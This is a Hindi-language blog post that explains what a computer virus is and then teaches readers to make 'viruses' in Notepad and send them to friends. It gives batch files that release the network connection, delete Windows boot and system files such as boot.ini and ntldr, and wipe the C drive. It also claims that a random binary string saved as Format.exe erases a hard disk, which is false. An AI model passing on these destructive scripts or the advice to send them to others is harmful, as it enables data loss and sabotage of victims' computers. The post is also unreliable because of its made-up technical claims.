Virus kya hai or Isko kaise banaye


Hi दोस्तों, इस Post में हम आपको बताएंगे कि “Virus kya hai or Isko kaise banaye” हाँ दोस्तों आप अपने Computer के Notepad की help से बहुत से Funny और Dangerous Virus बनाकर लोगों को डरा सकते हो. अगर आप Computer Virus बनाना सीखना चाहते हो तो इस Article को ध्यान से पढ़िए और इसमें बताए Steps को Follow करिए. तो दोस्तों सबसे पहले यह जान लेते हैं कि virus क्या होता है उसके बाद इसको बनाना सीखेंगे.


Virus kya hota hai ?


Virus [Vital Information Resources Under Siege] हमारे Computer के छोटे-छोटे Auto Excuted Programs होते हैं जो Computer में प्रवेश करके उसकी कार्य प्रणाली को damage कर देते हैं अगर आसान भाषा में कहूं तो यह एक ऐसा Computer Program है जो आपके permission के बिना आपके Computer या Laptop में enter हो जाते हैं और Computer के Hard disk को Slow करके दूसरे Program को damage कर देते हैं.


1. Computer का slow हो जाना.
अगर आपका Computer बहुत slow  हो गया है और किसी भी Software को open होने में ज्यादा time लग रहा है तो हो सकता है आपके Computer का CPU किसी virus या spyware को Process कर रहा है.


2. Computer का Hang हो जाना.
अगर Computer बार-बार चलते हुए रुक जाएं यानी hang हो जाए तो आपको समझ लेना चाहिए कि Computer में virus enter हो चुका है.


3. अनजाने Folders और Files का बन जाना.
अगर आपके Desktop पर कोई अनजान Folder या File दिखाई देता है जिसे आपने नहीं बनाया और ना ही किसी Software के Install होने से बना हो. आप जब ऐसे Folders को delete करोगे तो वह कुछ time बाद फिर से आ जाते हैं.


4.Browser की settings में change होना.
अगर आपके Browser का Homepage अपने आप change हो जाए तो हो सकता है आपके Computer पर किसी spyware का हमला हुआ है ऐसे में जब आप browser open करते हो तो कुछ web pages अपने आप खुल जाते हैं.



दोस्तों Computer से virus बनाना बहुत आसान है यहां नीचे हमने virus बनाने का बहुत आसान तरीका बताया है आपको सिर्फ नीचे दिए steps को Follow करने है.


Step 1. सबसे पहले अपने Computer में Notepad को open करें.


Step 2. इसके बाद नीचे दिए code को copy करके उसमें Paste कर दीजिए.


@Echo off
Ipconfig /release


Step 3. अब आप को इसे save करना है आप नीचे Image में देख सकते हैं मैंने इस File का नाम virus.bat रखा है आप भी अपने हिसाब से कोई भी नाम रख सकते हो लेकिन last में आपको .bat या .VBS जरूर लगाना है.


Step 4. अब इस File को अपने किसी Friend को send करो जब वह इस File को open करेगा तो उसका Ip Address block हो जाएगा और वह Internet नहीं use कर सकेगा.



इन सभी codes को उसी तरह use करें जैसे हमने ऊपर बताया है.
1. Computer को crash करने के लिए.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


इस code को copy करके अपने Computer के Notepad में Paste कर दीजिए और virus.bat के नाम से save कर दीजिए जब कोई इस File पर click करेगा तो उसका Computer crash हो जाएगा


2. Computer के C drive को delete करने के लिए.


@Echo off
Del C:\ *.* |y


इस code को delete.bat नाम से save करना है जब कोई इस पर click करेगा तो उसके computer का C drive delete हो जाएगा.


3. Hard disk delete करने के लिए.


01001011000111110010010101010101010000011111100000


इस code को Format.exe के नाम से save करना है जो इस File को open करेगा उसके computer की Hard disk delete हो जाएगी.



आपको यह " Virus kya hai or Isko kaise banaye  ” कैसे लगे हमें comment करके जरूर बताएं और इस Article को अपने Social media Friends के साथ भी share करें अगर आपको किसी trick के बारे में कोई सवाल पूछना है या इस post के लिए कोई suggestion देना है तो comment करके बताएं

Comments

Popular posts from this blog

Mi/Redmi Phones hard Reset Kaise kare

Top 10 Usefull Apps for students in Hindi

Vivo Y51/Y51L ko kaise convert kre lte to volte